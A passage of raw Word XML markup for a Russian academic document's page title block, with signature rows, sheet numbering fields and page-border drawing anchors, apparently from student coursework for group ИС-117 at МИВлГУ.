              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="852" w:type="dxa"/>
          <w:gridSpan w:val="3"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="4C533B8B" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Лит.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="964" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="30202FD8" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Лист</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1021" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="5DD83DF8" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Листов</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00FA5930" w14:paraId="250BA4BA" w14:textId="77777777" w:rsidTr="00907A58">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="964" w:type="dxa"/>
          <w:gridSpan w:val="2"/>
        </w:tcPr>
        <w:p w14:paraId="423C605D" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:proofErr w:type="spellStart"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Руков</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1304" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="2149A80E" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="849" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="21C0D384" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="7D7F2BCB" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="008041DB">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3969" w:type="dxa"/>
          <w:vMerge/>
        </w:tcPr>
        <w:p w14:paraId="12BFF778" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="284" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="69857FA6" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="284" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="417EE0F7" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="284" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="3B893F85" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="964" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="1B56985A" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>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Arabic  \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>6</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1021" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="641F6FA9" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>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NUMPAGES   \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>7</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00FA5930" w14:paraId="200E31B4" w14:textId="77777777" w:rsidTr="00907A58">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="964" w:type="dxa"/>
          <w:gridSpan w:val="2"/>
        </w:tcPr>
        <w:p w14:paraId="4ABB307D" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Конс.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1304" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="0A3FF8BD" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="849" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="53362F85" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="60C9D862" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="008041DB">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3969" w:type="dxa"/>
          <w:vMerge/>
        </w:tcPr>
        <w:p w14:paraId="3A7F03FD" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2837" w:type="dxa"/>
          <w:gridSpan w:val="5"/>
          <w:vMerge w:val="restart"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="35C8D954" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00EB7AB1" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:proofErr w:type="spellStart"/>
          <w:r w:rsidRPr="00EB7AB1">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>МИВлГУ</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
        </w:p>
        <w:p w14:paraId="75462BE0" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00EB7AB1">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>ИС-117</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00FA5930" w14:paraId="362C77B4" w14:textId="77777777" w:rsidTr="00907A58">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="964" w:type="dxa"/>
          <w:gridSpan w:val="2"/>
        </w:tcPr>
        <w:p w14:paraId="5B958DA5" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:proofErr w:type="spellStart"/>
          <w:proofErr w:type="gramStart"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Н.контр</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:proofErr w:type="gramEnd"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1304" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="1367E92E" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="849" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="14695551" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="27FAC278" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="008041DB">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3969" w:type="dxa"/>
          <w:vMerge/>
        </w:tcPr>
        <w:p w14:paraId="5A03385B" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2837" w:type="dxa"/>
          <w:gridSpan w:val="5"/>
          <w:vMerge/>
        </w:tcPr>
        <w:p w14:paraId="4895CED4" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00FA5930" w14:paraId="28790386" w14:textId="77777777" w:rsidTr="00907A58">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="964" w:type="dxa"/>
          <w:gridSpan w:val="2"/>
        </w:tcPr>
        <w:p w14:paraId="62F90250" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:proofErr w:type="spellStart"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Зав.каф</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1304" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="05DAB3AC" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="849" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="322B8395" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="4A63CA83" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="008041DB">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3969" w:type="dxa"/>
          <w:vMerge/>
        </w:tcPr>
        <w:p w14:paraId="715CE631" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2837" w:type="dxa"/>
          <w:gridSpan w:val="5"/>
          <w:vMerge/>
        </w:tcPr>
        <w:p w14:paraId="13F7E781" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="45890658" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRDefault="00FA593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7F38D" w14:textId="77777777" w:rsidR="000C52A4" w:rsidRDefault="000C52A4" w:rsidP="000F3CF9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="754FA25E" w14:textId="77777777" w:rsidR="000C52A4" w:rsidRDefault="000C52A4" w:rsidP="000F3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10017" w14:textId="125A905F" w:rsidR="000F3CF9" w:rsidRDefault="000F3CF9">
    <w:pPr>
      <w:pStyle w:val="a3"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="ru-RU"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="376154F8" wp14:editId="6C1B1D71">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>737870</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>234315</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6588000" cy="10188000"/>
              <wp:effectExtent l="19050" t="19050" r="22860" b="22860"/>
              <wp:wrapNone/>
              <wp:docPr id="1" name="Прямоугольник 1"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6588000" cy="101880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D74751" id="Прямоугольник 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:58.1pt;margin-top:18.45pt;width:518.75pt;height:802.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" filled="f" strokecolor="black [3213]" strokeweight="2.2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F98E0" w14:textId="77777777" w:rsidR="004654AE" w:rsidRDefault="004654AE">
    <w:pPr>
      <w:pStyle w:val="a3"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="ru-RU"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C988BC2" wp14:editId="2EE9A921">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>737870</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>234315</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6588000" cy="10188000"/>
              <wp:effectExtent l="19050" t="19050" r="22860" b="22860"/>
              <wp:wrapNone/>
              <wp:docPr id="2" name="Прямоугольник 2"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
